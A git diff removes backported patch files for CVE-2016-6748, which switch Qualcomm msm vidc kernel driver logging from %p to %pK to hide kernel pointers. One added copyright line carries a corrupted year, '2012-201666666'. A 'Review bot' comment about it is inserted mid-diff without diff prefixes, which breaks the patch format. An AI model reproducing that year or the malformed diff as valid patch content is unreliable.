-ENOMEM; - goto fail_smem_alloc; - } -- dprintk(VIDC_DBG, "venus_hfi_alloc: ptr = %p, size = %d\n", -+ dprintk(VIDC_DBG, "venus_hfi_alloc: ptr = %pK, size = %d\n", - alloc->kvaddr, size); - rc = msm_smem_cache_operations(dev->hal_client, alloc, - SMEM_CACHE_CLEAN); -@@ -631,7 +631,7 @@ fail_smem_alloc: - static void venus_hfi_free(struct venus_hfi_device *dev, struct msm_smem *mem) - { - if (!dev || !mem) { -- dprintk(VIDC_ERR, "invalid param %p %p\n", dev, mem); -+ dprintk(VIDC_ERR, "invalid param %pK %pK\n", dev, mem); - return; - } - -@@ -647,7 +647,7 @@ static void venus_hfi_write_register( - u32 hwiosymaddr = reg; - u8 *base_addr; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return; - } - if (device->clk_state != ENABLED_PREPARED) { -@@ -657,7 +657,7 @@ static void venus_hfi_write_register( - } - - base_addr = device->hal_data->register_base; -- dprintk(VIDC_DBG, "Base addr: 0x%p, written to: 0x%x, Value: 0x%x...\n", -+ dprintk(VIDC_DBG, "Base addr: 0x%pK, written to: 0x%x, Value: 0x%x...\n", - base_addr, hwiosymaddr, value); - 
base_addr += hwiosymaddr; - writel_relaxed(value, base_addr); -@@ -669,7 +669,7 @@ static int venus_hfi_read_register(struct venus_hfi_device *device, u32 reg) - int rc = 0; - u8 *base_addr; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - if (device->clk_state != ENABLED_PREPARED) { -@@ -681,7 +681,7 @@ static int venus_hfi_read_register(struct venus_hfi_device *device, u32 reg) - - rc = readl_relaxed(base_addr + reg); - rmb(); -- dprintk(VIDC_DBG, "Base addr: 0x%p, read from: 0x%x, value: 0x%x...\n", -+ dprintk(VIDC_DBG, "Base addr: 0x%pK, read from: 0x%x, value: 0x%x...\n", - base_addr, reg, rc); - - return rc; -@@ -783,7 +783,7 @@ static void venus_hfi_iommu_detach(struct venus_hfi_device *device) - int i; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "Invalid paramter: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid paramter: %pK\n", device); - return; - } - -@@ -1209,7 +1209,7 @@ static int __alloc_ocmem(struct venus_hfi_device *device) - unsigned long size; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - return -EINVAL; - } -@@ -1244,7 +1244,7 @@ static int __free_ocmem(struct venus_hfi_device *device) - int rc = 0; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - return -EINVAL; - } -@@ -1268,14 +1268,14 @@ static int __set_ocmem(struct venus_hfi_device *device, bool locked) - struct on_chip_mem *ocmem; - - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - return -EINVAL; - } - - ocmem = &device->resources.ocmem; - if (!ocmem->buf) { -- dprintk(VIDC_ERR, "Invalid params, ocmem_buffer: 0x%p\n", -+ 
dprintk(VIDC_ERR, "Invalid params, ocmem_buffer: 0x%pK\n", - ocmem->buf); - return -EINVAL; - } -@@ -1304,7 +1304,7 @@ static int __unset_ocmem(struct venus_hfi_device *device) - int rc = 0; - - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - rc = -EINVAL; - goto ocmem_unset_failed; -@@ -1335,7 +1335,7 @@ static int __alloc_set_ocmem(struct venus_hfi_device *device, bool locked) - int rc = 0; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - return -EINVAL; - } -@@ -1375,7 +1375,7 @@ static int __unset_free_ocmem(struct venus_hfi_device *device) - int rc = 0; - - if (!device || !device->res) { -- dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n", -+ dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n", - __func__, device); - return -EINVAL; - } -@@ -1551,7 +1551,7 @@ static unsigned long venus_hfi_get_core_clock_rate(void *dev) - struct clock_info *vc; - - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, device); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, device); - return -EINVAL; - } - -@@ -1607,7 +1607,7 @@ static int venus_hfi_halt_axi(struct venus_hfi_device *device) - u32 reg; - int rc = 0; - if (!device) { -- dprintk(VIDC_ERR, "Invalid input: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid input: %pK\n", device); - return -EINVAL; - } - /* -@@ -1642,7 +1642,7 @@ static inline int venus_hfi_power_off(struct venus_hfi_device *device) - int rc = 0; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - if (!device->power_enabled) { -@@ -1709,7 +1709,7 @@ static inline int venus_hfi_power_on(struct venus_hfi_device *device) - int rc = 0; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", 
device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - if (device->power_enabled) -@@ -1825,7 +1825,7 @@ static int venus_hfi_power_enable(void *dev) - int rc = 0; - struct venus_hfi_device *device = dev; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - mutex_lock(&device->write_lock); -@@ -1845,7 +1845,7 @@ static int venus_hfi_regulator_set_voltage( - struct regulator_info *rinfo = NULL; - - if (!device || !cv_info) { -- dprintk(VIDC_WARN, "%s: invalid args %p %p\n", -+ dprintk(VIDC_WARN, "%s: invalid args %pK %pK\n", - __func__, device, cv_info); - return -EINVAL; - } -@@ -1893,7 +1893,7 @@ static int venus_hfi_scale_regulators(struct venus_hfi_device *device, - bool matches = false; - - if (!device || !data) { -- dprintk(VIDC_ERR, "%s: Invalid args %p, %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid args %pK, %pK\n", - __func__, device, data); - return -EINVAL; - } -@@ -1968,7 +1968,7 @@ static int venus_hfi_scale_clocks(void *dev, int load, - struct venus_hfi_device *device = dev; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid args: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid args: %pK\n", device); - return -EINVAL; - } - -@@ -2566,7 +2566,7 @@ static int venus_hfi_core_init(void *device) - goto err_core_init; - } - -- dprintk(VIDC_DBG, "Dev_Virt: 0x%pa, Reg_Virt: 0x%p\n", -+ dprintk(VIDC_DBG, "Dev_Virt: 0x%pa, Reg_Virt: 0x%pK\n", - &dev->hal_data->firmware_base, - dev->hal_data->register_base); - -@@ -2718,12 +2718,12 @@ static void venus_hfi_core_clear_interrupt(struct venus_hfi_device *device) - device->intr_status |= intr_status; - device->reg_count++; - dprintk(VIDC_DBG, -- "INTERRUPT for device: 0x%p: times: %d interrupt_status: %d\n", -+ "INTERRUPT for device: 0x%pK: times: %d interrupt_status: %d\n", - device, device->reg_count, intr_status); - } else { - device->spur_count++; - dprintk(VIDC_INFO, -- "SPURIOUS_INTR for 
device: 0x%p: times: %d interrupt_status: %d\n", -+ "SPURIOUS_INTR for device: 0x%pK: times: %d interrupt_status: %d\n", - device, device->spur_count, intr_status); - } - -@@ -2876,7 +2876,7 @@ static int venus_hfi_session_clean(void *session) - sess_close = session; - device = sess_close->device; - venus_hfi_flush_debug_queue(sess_close->device, NULL); -- dprintk(VIDC_DBG, "deleted the session: 0x%p\n", -+ dprintk(VIDC_DBG, "deleted the session: 0x%pK\n", - sess_close); - mutex_lock(&device->session_lock); - list_del(&sess_close->list); -@@ -2914,7 +2914,7 @@ static void *venus_hfi_session_init(void *device, void *session_id, - new_session->codec = codec_type; - new_session->domain = session_type; - dprintk(VIDC_DBG, -- "%s: inst %p, session %p, codec 0x%x, domain 0x%x\n", -+ "%s: inst %pK, session %pK, codec 0x%x, domain 0x%x\n", - __func__, session_id, new_session, - new_session->codec, new_session->domain); - -@@ -2992,7 +2992,7 @@ static int venus_hfi_session_abort(void *sess) - struct hal_session *session; - session = sess; - if (!session || !session->device) { -- dprintk(VIDC_ERR, "%s: Invalid Params %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid Params %pK\n", - __func__, session); - return -EINVAL; - } -@@ -3012,7 +3012,7 @@ static int venus_hfi_session_set_buffers(void *sess, - struct venus_hfi_device *device; - - if (!session || !session->device || !buffer_info) { -- dprintk(VIDC_ERR, "%s: Invalid Params, %p %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid Params, %pK %pK\n", - __func__, session, buffer_info); - return -EINVAL; - } -@@ -3047,7 +3047,7 @@ static int venus_hfi_session_release_buffers(void *sess, - struct venus_hfi_device *device; - - if (!session || !session->device || !buffer_info) { -- dprintk(VIDC_ERR, "%s: Invalid Params %p, %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid Params %pK, %pK\n", - __func__, session, buffer_info); - return -EINVAL; - } -@@ -3738,7 +3738,7 @@ static void venus_hfi_response_handler(struct venus_hfi_device *device) - } - 
venus_hfi_flush_debug_queue(device, packet); - } else { -- dprintk(VIDC_DBG, "device (%p) is in deinit state\n", device); -+ dprintk(VIDC_DBG, "device (%pK) is in deinit state\n", device); - } - kfree(packet); - } -@@ -3750,7 +3750,7 @@ static void venus_hfi_core_work_handler(struct work_struct *work) - - dprintk(VIDC_INFO, "GOT INTERRUPT\n"); - if (!device->callback) { -- dprintk(VIDC_ERR, "No interrupt callback function: %p\n", -+ dprintk(VIDC_ERR, "No interrupt callback function: %pK\n", - device); - return; - } -@@ -3850,7 +3850,7 @@ static inline int venus_hfi_init_clocks(struct msm_vidc_platform_resources *res, - struct clock_info *cl = NULL; - - if (!res || !device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - -@@ -3921,7 +3921,7 @@ static inline void venus_hfi_disable_unprepare_clks( - struct clock_info *cl; - - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return; - } - -@@ -3957,7 +3957,7 @@ static inline int venus_hfi_prepare_enable_clks(struct venus_hfi_device *device) - struct clock_info *cl = NULL, *cl_fail = NULL; - int rc = 0; - if (!device) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", device); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", device); - return -EINVAL; - } - -@@ -4026,7 +4026,7 @@ static int venus_hfi_register_iommu_domains(struct venus_hfi_device *device, - domain = iommu_group_get_iommudata(iommu_map->group); - if (!domain) { - dprintk(VIDC_ERR, -- "Failed to get domain data for group %p\n", -+ "Failed to get domain data for group %pK\n", - iommu_map->group); - rc = -EINVAL; - goto fail_group; -@@ -4034,7 +4034,7 @@ static int venus_hfi_register_iommu_domains(struct venus_hfi_device *device, - iommu_map->domain = msm_find_domain_no(domain); - if (iommu_map->domain < 0) { - dprintk(VIDC_ERR, -- "Failed to get domain index for domain %p\n", -+ "Failed to get domain 
index for domain %pK\n", - domain); - rc = -EINVAL; - goto fail_group; -@@ -4180,7 +4180,7 @@ static int venus_hfi_init_resources(struct venus_hfi_device *device, - - device->res = res; - if (!res) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", res); -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", res); - return -ENODEV; - } - -@@ -4237,7 +4237,7 @@ static int venus_hfi_iommu_get_domain_partition(void *dev, u32 flags, - struct venus_hfi_device *device = dev; - - if (!device) { -- dprintk(VIDC_ERR, "%s: Invalid param device: %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid param device: %pK\n", - __func__, device); - return -EINVAL; - } -@@ -4262,7 +4262,7 @@ static int protect_cp_mem(struct venus_hfi_device *device) - - iommu_group_set = &device->res->iommu_group_set; - if (!iommu_group_set) { -- dprintk(VIDC_ERR, "invalid params: %p\n", iommu_group_set); -+ dprintk(VIDC_ERR, "invalid params: %pK\n", iommu_group_set); - return -EINVAL; - } - -@@ -4430,7 +4430,7 @@ static int venus_hfi_load_fw(void *dev) - struct venus_hfi_device *device = dev; - - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid paramter: %p\n", -+ dprintk(VIDC_ERR, "%s Invalid paramter: %pK\n", - __func__, device); - return -EINVAL; - } -@@ -4520,7 +4520,7 @@ static void venus_hfi_unload_fw(void *dev) - { - struct venus_hfi_device *device = dev; - if (!device) { -- dprintk(VIDC_ERR, "%s Invalid paramter: %p\n", -+ dprintk(VIDC_ERR, "%s Invalid paramter: %pK\n", - __func__, device); - return; - } -@@ -4556,7 +4556,7 @@ static int venus_hfi_get_fw_info(void *dev, struct hal_fw_info *fw_info) - - if (!device || !fw_info) { - dprintk(VIDC_ERR, -- "%s Invalid paramter: device = %p fw_info = %p\n", -+ "%s Invalid paramter: device = %pK fw_info = %pK\n", - __func__, device, fw_info); - return -EINVAL; - } -@@ -4745,7 +4745,7 @@ static void *venus_hfi_get_device(u32 device_id, - int rc = 0; - - if (!res || !callback) { -- dprintk(VIDC_ERR, "Invalid params: %p %p\n", res, callback); -+ dprintk(VIDC_ERR, "Invalid 
params: %pK %pK\n", res, callback); - return NULL; - } - -@@ -4845,7 +4845,7 @@ int venus_hfi_initialize(struct hfi_device *hdev, u32 device_id, - int rc = 0; - - if (!hdev || !res || !callback) { -- dprintk(VIDC_ERR, "Invalid params: %p %p %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n", - hdev, res, callback); - rc = -EINVAL; - goto err_venus_hfi_init; -diff --git a/drivers/media/platform/msm/vidc/vidc_hfi.c b/drivers/media/platform/msm/vidc/vidc_hfi.c -index ef0de37..193b42f 100644 ---- a/drivers/media/platform/msm/vidc/vidc_hfi.c -+++ b/drivers/media/platform/msm/vidc/vidc_hfi.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2013, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -61,7 +61,7 @@ void vidc_hfi_deinitialize(enum msm_vidc_hfi_type hfi_type, - struct hfi_device *hdev) - { - if (!hdev) { -- dprintk(VIDC_ERR, "%s invalid device %p", __func__, hdev); -+ dprintk(VIDC_ERR, "%s invalid device %pK", __func__, hdev); - return; - } - -diff --git a/drivers/media/platform/msm/vidc/vmem/vmem.c b/drivers/media/platform/msm/vidc/vmem/vmem.c -index 81e5b08..fb733fb 100644 ---- a/drivers/media/platform/msm/vidc/vmem/vmem.c -+++ b/drivers/media/platform/msm/vidc/vmem/vmem.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2014, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2016, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -115,7 +115,7 @@ static inline u32 __readl(void * __iomem addr)
- {
- u32 value = 0;
-
-- pr_debug("read %p ", addr);
-+ pr_debug("read %pK ", addr);
- value = readl_relaxed(addr);
- pr_debug("-> %08x\n", value);
-
-@@ -124,7 +124,7 @@ static inline u32 __readl(void * __iomem addr)
-
- static inline void __writel(u32 val, void * __iomem addr)
- {
-- pr_debug("write %08x -> %p\n", val, addr);
-+ pr_debug("write %08x -> %pK\n", val, addr);
- writel_relaxed(val, addr);
- /*
- * Commit all writes via a mem barrier, as subsequent __readl()
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch
deleted file mode 100644
index e6bc8818..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6748/3.18/0002.patch
+++ /dev/null
@@ -1,1739 +0,0 @@ -From 313d9f89e76ada8d900c9a578cd5cb77d5813625 Mon Sep 17 00:00:00 2001 -From: Abdulla Anam -Date: Fri, 3 Jun 2016 17:39:42 +0530 -Subject: msm: vidc: use %pK instead of %p which respects kptr_restrict sysctl - -Hide kernel pointers from unprivileged ussers by using %pK format- -specifier instead of %p. This respects the kptr_restrict sysctl -setting which is by default on. So by default %pK will print zeroes -as address. echo 1 to kptr_restrict to print proper kernel addresses. - -CRs-Fixed: 987018 -Change-Id: I4772257a557c6730ecc0624cbc8e5614e893e9fd -Signed-off-by: Abdulla Anam -Signed-off-by: Bikshapathi Kothapeta ---- - .../msm/vidc/governors/msm_vidc_table_gov.c | 6 +- - .../media/platform/msm/vidc/hfi_packetization.c | 8 +- - .../media/platform/msm/vidc/hfi_response_handler.c | 8 +- - drivers/media/platform/msm/vidc/msm_smem.c | 32 +++--- - drivers/media/platform/msm/vidc/msm_v4l2_vidc.c | 6 +- - drivers/media/platform/msm/vidc/msm_vdec.c | 34 +++--- - drivers/media/platform/msm/vidc/msm_venc.c | 34 +++--- - drivers/media/platform/msm/vidc/msm_vidc.c | 30 ++--- - drivers/media/platform/msm/vidc/msm_vidc_common.c | 122 ++++++++++----------- - drivers/media/platform/msm/vidc/msm_vidc_dcvs.c | 16 +-- - drivers/media/platform/msm/vidc/msm_vidc_debug.c | 20 ++-- - .../media/platform/msm/vidc/msm_vidc_res_parse.c | 6 +- - drivers/media/platform/msm/vidc/venus_boot.c | 4 +- - drivers/media/platform/msm/vidc/venus_hfi.c | 52 ++++----- - drivers/media/platform/msm/vidc/vidc_hfi.c | 4 +- - drivers/media/platform/msm/vidc/vmem/vmem.c | 7 +- - 16 files changed, 194 insertions(+), 195 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c b/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c -index f733c08..dded8a2 100644 ---- a/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c -+++ b/drivers/media/platform/msm/vidc/governors/msm_vidc_table_gov.c -@@ -90,7 +90,7 @@ static int 
msm_vidc_table_get_target_freq(struct devfreq *dev, - int i = 0; - - if (!dev || !frequency || !flag) { -- dprintk(VIDC_ERR, "%s: Invalid params %p, %p, %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid params %pK, %pK, %pK\n", - __func__, dev, frequency, flag); - return -EINVAL; - } -@@ -173,7 +173,7 @@ static int msm_vidc_free_bus_table(struct platform_device *pdev, - int rc = 0, i = 0; - - if (!pdev || !data) { -- dprintk(VIDC_ERR, "%s: invalid args %p %p\n", -+ dprintk(VIDC_ERR, "%s: invalid args %pK %pK\n", - __func__, pdev, data); - return -EINVAL; - } -@@ -197,7 +197,7 @@ static int msm_vidc_load_bus_table(struct platform_device *pdev, - struct device_node *child_node = NULL; - - if (!pdev || !data) { -- dprintk(VIDC_ERR, "%s: invalid args %p %p\n", -+ dprintk(VIDC_ERR, "%s: invalid args %pK %pK\n", - __func__, pdev, data); - return -EINVAL; - } -diff --git a/drivers/media/platform/msm/vidc/hfi_packetization.c b/drivers/media/platform/msm/vidc/hfi_packetization.c -index 0d38aa9..90e4aa4 100644 ---- a/drivers/media/platform/msm/vidc/hfi_packetization.c -+++ b/drivers/media/platform/msm/vidc/hfi_packetization.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-201666666, The Linux Foundation. All rights reserved. 
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1439,7 +1439,7 @@ int create_pkt_cmd_session_set_property(
- break;
- default:
- dprintk(VIDC_ERR,
-- "Invalid Rate control setting: %p\n",
-+ "Invalid Rate control setting: %pK\n",
- pdata);
- break;
- }
-@@ -2130,7 +2130,7 @@ int create_pkt_ssr_cmd(enum hal_ssr_trigger_type type,
- struct hfi_cmd_sys_test_ssr_packet *pkt)
- {
- if (!pkt) {
-- dprintk(VIDC_ERR, "Invalid params, device: %p\n", pkt);
-+ dprintk(VIDC_ERR, "Invalid params, device: %pK\n", pkt);
- return -EINVAL;
- }
- pkt->size = sizeof(struct hfi_cmd_sys_test_ssr_packet);
-@@ -2143,7 +2143,7 @@ int create_pkt_cmd_sys_image_version(
- struct hfi_cmd_sys_get_property_packet *pkt)
- {
- if (!pkt) {
-- dprintk(VIDC_ERR, "%s invalid param :%p\n", __func__, pkt);
-+ dprintk(VIDC_ERR, "%s invalid param :%pK\n", __func__, pkt);
- return -EINVAL;
- }
- pkt->size = sizeof(struct hfi_cmd_sys_get_property_packet);
-diff --git a/drivers/media/platform/msm/vidc/hfi_response_handler.c b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-index db0ea848a..91eab00 100644
---- a/drivers/media/platform/msm/vidc/hfi_response_handler.c
-+++ b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
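Review bot: The new copyright line in the first hunk of hfi_packetization.c reads `2012-201666666`, which looks like a stuck key rather than an intended year range. Every other file touched by this patch ends the range at 2016, so the line should be `/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.`.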
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -943,7 +943,7 @@ static enum vidc_status hfi_parse_init_done_properties(
- }
- default:
- dprintk(VIDC_DBG,
-- "%s: default case - data_ptr %p, prop_id 0x%x\n",
-+ "%s: default case - data_ptr %pK, prop_id 0x%x\n",
- __func__, data_ptr, prop_id);
- break;
- }
-@@ -1043,7 +1043,7 @@ static void hfi_process_sess_get_prop_profile_level(
- dprintk(VIDC_DBG, "Entered %s\n", __func__);
- if (!prop) {
- dprintk(VIDC_ERR,
-- "hal_process_sess_get_profile_level: bad_prop: %p\n",
-+ "hal_process_sess_get_profile_level: bad_prop: %pK\n",
- prop);
- return;
- }
-@@ -1074,7 +1074,7 @@ static void hfi_process_sess_get_prop_buf_req(
-
- if (!prop) {
- dprintk(VIDC_ERR,
-- "hal_process_sess_get_prop_buf_req: bad_prop: %p\n",
-+ "hal_process_sess_get_prop_buf_req: bad_prop: %pK\n",
- prop);
- return;
- }
-diff --git a/drivers/media/platform/msm/vidc/msm_smem.c b/drivers/media/platform/msm/vidc/msm_smem.c
-index 009d827..f4724c9 100644
---- a/drivers/media/platform/msm/vidc/msm_smem.c
-+++ b/drivers/media/platform/msm/vidc/msm_smem.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -45,7 +45,7 @@ static int get_device_address(struct smem_client *smem_client, - struct context_bank_info *cb = NULL; - - if (!iova || !buffer_size || !hndl || !smem_client || !mapping_info) { -- dprintk(VIDC_ERR, "Invalid params: %p, %p, %p, %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK, %pK, %pK, %pK\n", - smem_client, hndl, iova, buffer_size); - return -EINVAL; - } -@@ -107,7 +107,7 @@ static int get_device_address(struct smem_client *smem_client, - } - if (table->sgl) { - dprintk(VIDC_DBG, -- "%s: CB : %s, DMA buf: %p, device: %p, attach: %p, table: %p, table sgl: %p, rc: %d, dma_address: %pa\n", -+ "%s: CB : %s, DMA buf: %pK, device: %pK, attach: %pK, table: %pK, table sgl: %pK, rc: %d, dma_address: %pa\n", - __func__, cb->name, buf, cb->dev, attach, - table, table->sgl, rc, - &table->sgl->dma_address); -@@ -137,7 +137,7 @@ static int get_device_address(struct smem_client *smem_client, - } - } - -- dprintk(VIDC_DBG, "mapped ion handle %p to %pa\n", hndl, iova); -+ dprintk(VIDC_DBG, "mapped ion handle %pK to %pa\n", hndl, iova); - return 0; - mem_map_sg_failed: - dma_buf_unmap_attachment(attach, table, DMA_BIDIRECTIONAL); -@@ -157,7 +157,7 @@ static void put_device_address(struct smem_client *smem_client, - struct ion_client *clnt = NULL; - - if (!hndl || !smem_client || !mapping_info) { -- dprintk(VIDC_WARN, "Invalid params: %p, %p\n", -+ dprintk(VIDC_WARN, "Invalid params: %pK, %pK\n", - smem_client, hndl); - return; - } -@@ -175,7 +175,7 @@ static void put_device_address(struct smem_client *smem_client, - } - if (is_iommu_present(smem_client->res)) { - dprintk(VIDC_DBG, -- "Calling dma_unmap_sg - device: %p, address: %pa, buf: %p, table: %p, attach: %p\n", -+ "Calling dma_unmap_sg - device: %pK, address: %pa, buf: %pK, table: %pK, attach: %pK\n", - mapping_info->dev, - 
&mapping_info->table->sgl->dma_address, - mapping_info->buf, mapping_info->table, -@@ -204,9 +204,9 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset, - unsigned long ion_flags = 0; - - hndl = ion_import_dma_buf(client->clnt, fd); -- dprintk(VIDC_DBG, "%s ion handle: %p\n", __func__, hndl); -+ dprintk(VIDC_DBG, "%s ion handle: %pK\n", __func__, hndl); - if (IS_ERR_OR_NULL(hndl)) { -- dprintk(VIDC_ERR, "Failed to get handle: %p, %d, %d, %p\n", -+ dprintk(VIDC_ERR, "Failed to get handle: %pK, %d, %d, %pK\n", - client, fd, offset, hndl); - rc = -ENOMEM; - goto fail_import_fd; -@@ -242,7 +242,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset, - goto fail_device_address; - } - dprintk(VIDC_DBG, -- "%s: ion_handle = %p, fd = %d, device_addr = %pa, size = %zx, kvaddr = %p, buffer_type = %d, flags = %#lx\n", -+ "%s: ion_handle = %pK, fd = %d, device_addr = %pa, size = %zx, kvaddr = %pK, buffer_type = %d, flags = %#lx\n", - __func__, mem->smem_priv, fd, &mem->device_addr, mem->size, - mem->kvaddr, mem->buffer_type, mem->flags); - return rc; -@@ -339,7 +339,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align, - hndl = ion_alloc(client->clnt, size, align, heap_mask, ion_flags); - if (IS_ERR_OR_NULL(hndl)) { - dprintk(VIDC_ERR, -- "Failed to allocate shared memory = %p, %zx, %d, %#x\n", -+ "Failed to allocate shared memory = %pK, %zx, %d, %#x\n", - client, size, align, flags); - rc = -ENOMEM; - goto fail_shared_mem_alloc; -@@ -377,7 +377,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align, - } - mem->size = size; - dprintk(VIDC_DBG, -- "%s: ion_handle = %p, device_addr = %pa, size = %#zx, kvaddr = %p, buffer_type = %#x, flags = %#lx\n", -+ "%s: ion_handle = %pK, device_addr = %pa, size = %#zx, kvaddr = %pK, buffer_type = %#x, flags = %#lx\n", - __func__, mem->smem_priv, &mem->device_addr, - mem->size, mem->kvaddr, mem->buffer_type, mem->flags); - return rc; 
-@@ -393,7 +393,7 @@ fail_shared_mem_alloc: - static void free_ion_mem(struct smem_client *client, struct msm_smem *mem) - { - dprintk(VIDC_DBG, -- "%s: ion_handle = %p, device_addr = %pa, size = %#zx, kvaddr = %p, buffer_type = %#x\n", -+ "%s: ion_handle = %pK, device_addr = %pa, size = %#zx, kvaddr = %pK, buffer_type = %#x\n", - __func__, mem->smem_priv, &mem->device_addr, - mem->size, mem->kvaddr, mem->buffer_type); - -@@ -408,7 +408,7 @@ static void free_ion_mem(struct smem_client *client, struct msm_smem *mem) - (u32)mem->buffer_type, -1, mem->size, -1, - mem->flags, -1); - dprintk(VIDC_DBG, -- "%s: Freeing handle %p, client: %p\n", -+ "%s: Freeing handle %pK, client: %pK\n", - __func__, mem->smem_priv, client->clnt); - ion_free(client->clnt, mem->smem_priv); - trace_msm_smem_buffer_ion_op_end("FREE", (u32)mem->buffer_type, -@@ -469,7 +469,7 @@ static int ion_cache_operations(struct smem_client *client, - int rc = 0; - int msm_cache_ops = 0; - if (!mem || !client) { -- dprintk(VIDC_ERR, "Invalid params: %p, %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK, %pK\n", - mem, client); - return -EINVAL; - } -@@ -516,7 +516,7 @@ int msm_smem_cache_operations(void *clt, struct msm_smem *mem, - struct smem_client *client = clt; - int rc = 0; - if (!client) { -- dprintk(VIDC_ERR, "Invalid params: %p\n", -+ dprintk(VIDC_ERR, "Invalid params: %pK\n", - client); - return -EINVAL; - } -@@ -667,7 +667,7 @@ struct context_bank_info *msm_smem_get_context_bank(void *clt, - cb->buffer_type & buffer_type) { - match = cb; - dprintk(VIDC_DBG, -- "context bank found for CB : %s, device: %p mapping: %p\n", -+ "context bank found for CB : %s, device: %pK mapping: %pK\n", - match->name, match->dev, match->mapping); - break; - } -diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -index 0f7ddf5..4ef6cb5 100644 ---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -@@ -1,4 
